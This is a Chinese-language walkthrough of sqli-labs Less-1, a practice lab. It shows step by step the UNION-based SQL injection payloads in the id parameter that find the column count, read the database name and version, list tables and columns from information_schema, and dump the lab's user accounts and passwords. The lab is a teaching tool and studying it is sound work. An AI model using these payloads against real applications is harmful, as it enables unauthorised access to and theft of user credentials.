less-1

题目：GET - Error based - Single quotes - String

基于错误的单引号GET型字符注入

尝试闭合'

?id=1 'and 1=2--+

有反应，报错了

闭合成功，可以注入

开始注入

?id=1 'order by 5--+

?id=1 'order by 4--+

?id=1 'order by 3--+

总共有三个字段

查看可显示字段

?id=-1 'union select 1,2,3--+

2,3可显示

搜索数据库名与版本

?id=-1 'union select 1,database(),version()--+

库名：security

版本：5.7.26

搜索表名

?id=-1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

表名：emails,referers,uagents,users

搜索列名

?id=-1 'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

列名：USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password

搜索账密

?id=-1 'union select 1,username,password from users limit 0,1--+

账：Dumb

密：Dumb

?id=-1 'union select 1,username,password from users limit 1,1--+

账：Angelina

密：I-kill-you

?id=-1 'union select 1,username,password from users limit 2,1--+

账：Dummy

密：p@ssword

依次类推可找出全部账密

也可以用

?id=-1 'union select 1,group_concat(username),group_concat(password) from users--+

尝试搜索全部，但是很有收集不全。

本栏目推荐文章
• devmapper: Thin Pool has 162394 free data blocks which is less than minimum required 163840 free data blocks
• Less的优点
• less命令
• 【sqli-labs】 page-2 Less 23-37
• 【sqli-labs】 page-3 Less 38-53
• 【sqli-labs】 page-4 Less 54-65
• Less不可小觑
• As a project I always want to create for myself as a gift, the MVVM framework is more or less satisfying
• [LeetCode] 2824. Count Pairs Whose Sum is Less than Target
• Less Prime素数单词

lessless6 less7 less2 less4 less1 graph-less less5 sqli-labs sqli labs less sqli-labs-less 变量less